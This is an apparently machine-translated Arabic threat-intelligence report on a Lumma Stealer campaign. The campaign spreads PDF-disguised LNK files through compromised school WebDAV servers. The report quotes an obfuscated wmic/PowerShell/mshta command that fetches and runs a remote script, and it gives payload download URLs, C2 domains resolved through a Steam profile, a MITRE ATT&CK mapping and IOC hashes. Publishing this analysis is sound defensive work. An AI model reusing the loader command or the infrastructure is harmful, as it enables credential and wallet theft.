Lumma Stealer Chronicles: حملة تحت عنوان PDF باستخدام البنية التحتية للمؤسسات التعليمية المعرضة للخطر

تستغل حملة Lumma Stealer للبرامج الضارة المؤسسات التعليمية المخترقة لتوزيع ملفات LNK الضارة المتخفية في صورة ملفات PDF، وتستهدف صناعات مثل التمويل والرعاية الصحية والتكنولوجيا والإعلام. بمجرد تنفيذ هذه الملفات، تبدأ عملية إصابة خفية متعددة المراحل، مما يسمح لمجرمي الإنترنت بسرقة كلمات المرور وبيانات المتصفح ومحافظ العملات المشفرة. بفضل تقنيات التهرب المتطورة، بما في ذلك استخدام ملفات تعريف Steam لعمليات القيادة والتحكم، يسلط تهديد البرامج الضارة كخدمة (MaaS) الضوء على الحاجة الملحة لدفاعات قوية للأمن السيبراني. كن يقظًا ضد أساليب التصيد الاحتيالي الخادعة لحماية المعلومات الحساسة من الاستغلال الإلكتروني.

مايانك ساهاريا

February 14, 2025

ملخص تنفيذي

Lumma Stealer هو برنامج ضار لسرقة المعلومات يتم تقديمه من خلال منصة البرامج الضارة كخدمة (MaaS). تم تصميمه لسرقة البيانات الحساسة، بما في ذلك كلمات المرور ومعلومات المتصفح وتفاصيل محفظة العملة المشفرة.

يوضح هذا التقرير تفاصيل حملة البرامج الضارة المستمرة التي توزع سارق معلومات Lumma Stealer. يتضمن ناقل العدوى الأساسي للحملة استخدام ملفات LNK (الاختصارات) الضارة التي تم تصميمها لتظهر كمستندات PDF شرعية. تبدأ ملفات LNK هذه، عند تنفيذها، عملية إصابة متعددة المراحل تؤدي في النهاية إلى نشر Lumma Stealer على جهاز الضحية. وتركز الحملة على خداع المستخدمين لتنفيذ ملفات ضارة، وتسليط الضوء على أهمية وعي المستخدم والتدابير الأمنية القوية. تستهدف حملة البرامج الضارة العديد من الصناعات، بما في ذلك التعليم والأوساط الأكاديمية، والشركات والأعمال، والحكومة والشؤون القانونية، والرعاية الصحية والأدوية، والمالية والمصرفية، والهندسة والتصنيع، والتكنولوجيا والبلوك تشين، والإعلام والصحافة.

في السابق، نشرنا تقريرين بحثيين متعمقين لتحليل حملة Lumma Stealer، مع تفصيل تكتيكاتها وتقنياتها وإجراءاتها (TTPs) التي تستخدمها الجهات الفاعلة في مجال التهديد لتوزيع البرامج الضارة ونشرها.

‍

‍

الإسناد والتحليل

خلال حل وسط من سيارة إلى أخرى، تتم إعادة توجيه المستخدم في البداية إلى خادم ويبداف أثناء زيارة مواقع ويب معينة، وإنشاء اتصال دون علم. قد تؤدي عملية إعادة التوجيه هذه إلى تشغيل معاينة نافذة explorer.exe، وعرض محتويات خادم WebDAV، والذي يستضيف ملفات ضارة مصممة لاستغلال نقاط الضعف في النظام أو تقديم برامج ضارة.

في البنية التحتية التي تم تحليلها، ملفات ضارة تم استضافتهم على خادم ويبداف داخل الدليل المفتوح «http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk»، عندما ينقر المستخدم لتنزيل هيكل الرسوم المدرسية، يقومون بتنزيل ملف ملف "pdf.lnk" الضار، والذي يظهر كملف PDF بسبب أيقونته.

‍

‍

يحتوي الدليل بشكل أساسي ملف «.lnk»، والتي تم تسليحها من أجل تنزيل حمولات ضارة إضافية باستخدام «mshta.exe»، وهو برنامج تنفيذي شرعي من Microsoft مصمم للتشغيل ملفات تطبيق ميكروسوفت أتش تي أم أل (HTA).

غالبًا ما يتم الاستفادة من ملفات LNK (الاختصارات) كنقطة دخول في حملات التصيد الاحتيالي. من خلال استغلال ميزاتها الفريدة، يمكن للجهات الفاعلة في مجال التهديد خداع المستخدمين وتجاوز الإجراءات الأمنية، مما يجعلهم أدوات فعالة للتسلل إلى الأنظمة والشبكات.

‍

‍

يقوم ملف LNK بتشغيل ملف بوويرشيل الأمر الذي يتصل بـ بعيد الخادم، مما يؤدي إلى المرحلة التالية من الهجوم. «استدعاء عملية C:\Windows\System32\Wbem\wmic.exe ينشئ «بوويرشيل إنيكس '\ *i*\ S*3*\ m*ta.e* https://80.76.51.231/Samarik' | بوويرشيل -»

‍

‍

‍

هذه الاختصارات الخادعة، التي غالبًا ما تكون مموهة كملفات تنفيذية مشروعة أو ملفات PDF، تغري المستخدمين المطمئنين إلى النقر، مما يؤدي في النهاية إلى تعريض أنظمتهم أو شبكاتهم للخطر.

قمنا باستخراج النص عن طريق التخلص من قسم التراكب، والكشف عن شيء غامض جافا سكريبت كود.

‍

‍

مشوشة جافا سكريبت كود في قسم التراكب في ساماريك

‍

‍

تقوم هذه الوظيفة بتقييم شفرة JavaScript المخزنة في المتغير aEQ. يعد استخدام eval أسلوبًا شائعًا في البرامج النصية الغامضة أو الخبيثة.

‍

‍

يمكن رؤية البرنامج النصي PowerShell من خلال البرنامج النصي JS المبهم. يتم تضمين حمولة مشفرة بـ AES وإجراء لفك تشفيرها في وضع CBC باستخدام مفتاح فك التشفير الثابت في برنامج PowerShell النصي هذا. كما تستخدم تقنيات التشويش الرياضي البسيطة في البرنامج النصي.

‍

‍

تُظهر المتغيرات والوظائف العادية لبرنامج PowerShell النصي كيفية تنزيل الحمولة وتنفيذها.

‍

‍

يتم تنزيل البرنامج النصي النهائي لـ PowerShell واستخراج المحتويات وتنفيذها»كومباس-4.1.2.exe«(لوما ستيلر) من https [:] //80.76.51 [.] 231/كومباس-4.1.2.exe

يحاول Lumma Stealer الاتصال بخوادم الأوامر والتحكم (C2) لتصفية البيانات المسروقة بعد إصابة النظام. يحاول الوصول إلى نطاقات خادم C2 متعددة؛ ومع ذلك، لا يمكن الوصول إلى هذه الخوادم حاليًا.

‍

*تتواصل البرامج الضارة مع c2 وsteamcommunity*

‍

يستخدم النموذج اتصال Steam إذا لم يتمكن من الوصول إلى كل مجال C2 يمتلكه. تختلف عناوين URL الخاصة بـ Steam عن نطاقات C2 من حيث أنها تحتوي على تقنيات فك تشفير مميزة ويتم تخزينها كرموز تنفيذ.

hxxps: //steamcommunity.com/profiles/76561199724331900

يتبع الرقم 76561199724331900 تنسيق معرف Steam64، مما يشير إلى أن عميل Steam أو اللعبة ربما تحاول حل خدمة شبكة. يشير هذا إلى أن جهازًا على الشبكة يحاول حل الاسم (من المحتمل أن يكون مرتبطًا بجلسة Steam أو خادم الألعاب). تم إنشاء ملف التعريف في 28 يونيو 2024.

‍

‍

يعد إخفاء C2 عبر ملفات تعريف Steam أسلوبًا متطورًا للتهرب ينتهك منصة موثوقة للاتصال الخفي بالقيادة والتحكم.

‍

‍

من المرجح أن يكون ممثل التهديد قد أنشأ عنوان URL هذا لـ Steam، وهو صفحة ملف تعريف لحساب Steam. تتصل العينة أولاً بموقع الويب، وتوزع علامة «actual_persona_name» لاستخراج السلاسل، ثم تستخدم طريقة تشفير Caesar لفك تشفير السلاسل واستخراج نطاقات C2.

‍

‍

استنادًا إلى تحليل الأسماء المختلفة التي تحاكي مستندات PDF الشرعية (مثل العقود والتقارير المالية والمواد الأكاديمية والكتيبات الفنية)، تستهدف برامج Lumma Stealer الضارة الصناعات بما في ذلك على سبيل المثال لا الحصر التعليم والأوساط الأكاديمية والشركات والأعمال والحكومة والشؤون القانونية والرعاية الصحية والأدوية والمالية والمصرفية والهندسة والتصنيع والتكنولوجيا والبلوك تشين والإعلام والصحافة.

‍

*أسماء مختلفة تحاكي مستندات PDF الشرعية*

‍

تكتيكات وتقنيات MITRE ATT&CK:

Tactic	Technique
Execution (TA0002)	T1059 – Command and Scripting Interpreter: PowerShell
	T1204.002 – User Execution: Malicious File
	T1047 – Windows Management Instrumentation (WMI)
Persistence (TA0003)	T1547.001 – Registry Run Keys / Startup Folder
Privilege Escalation (TA0004)	T1218.011 – System Binary Proxy Execution: Rundll32
Defense Evasion (TA0005)	T1027 – Obfuscated Files or Information
	T1036.003 – Masquerading: Rename System Utilities
	T1564.003 – Hide Artifacts: Hidden Window
Credential Access (TA0006)	T1012 – Query Registry
Discovery (TA0007)	T1082 – System Information Discovery
Lateral Movement (TA0008)	T1021.002 – Remote Services: SMB/Windows Admin Shares
Collection (TA0009)	T1114 – Email Collection
	T1560 – Archive Collected Data
Command and Control (TA0011)	T1071 – Application Layer Protocol
Exfiltration (TA0010)	T1041 – Exfiltration Over C2 Channel
Impact (TA0040)	T1489 – Service Stop
	T1490 – Inhibit System Recovery

‍

مؤشرات التسوية (IOCs):

Hash's (sha256)	File
BB2E14BB962873722F1FD132FF66C4AFD2F7DC9B6891C746D697443C0007426A	pdf.lnk
e15c6ecb32402f981c06f3d8c48f7e3a5a36d0810aa8c2fb8da0be053b95a8e2	Kompass-4.1.2.exe (Lumma stealer)
40b80287ba2af16daaf8e74a9465a0b876ab39f68c7ba6405cfcb41601eeec15	Samarik

URL	Category
tripeggyun.fun	Domain
processhol.sbs	Domain
librari-night.sbs	Domain
befall-sm0ker.sbs	Domain
p10tgrace.sbs	Domain
peepburry828.sbs	Domain
owner-vacat10n.sbs	Domain
3xp3cts1aim.sbs	Domain
p3ar11fter.sbs	Domain
smiteattacker.org	Decrypted Steam C2 Domains
yuriy-gagarin.com	Decrypted Steam C2 Domains
vladimir-ulyanov.com	Decrypted Steam C2 Domains
nikolay-romanov.su	Decrypted Steam C2 Domains
aleksandr-block.com	Decrypted Steam C2 Domains
misha-lomonosov.com	Decrypted Steam C2 Domains
sputnik-1985.com	Decrypted Steam C2 Domains
lev-tolstoi.com	Decrypted Steam C2 Domains
https[:]//80.76.51.231/Kompass-4.1.2.exe	Remote C2 URL
https[:]//80.76.51.231/Samarik	Remote C2 URL
http[:]//87.120.115.240/Downloads/254-zebar-school-for-children-that-tej-pro-order-abad-rural.pdf.lnk	WebDAV Servers (Lnk hosted)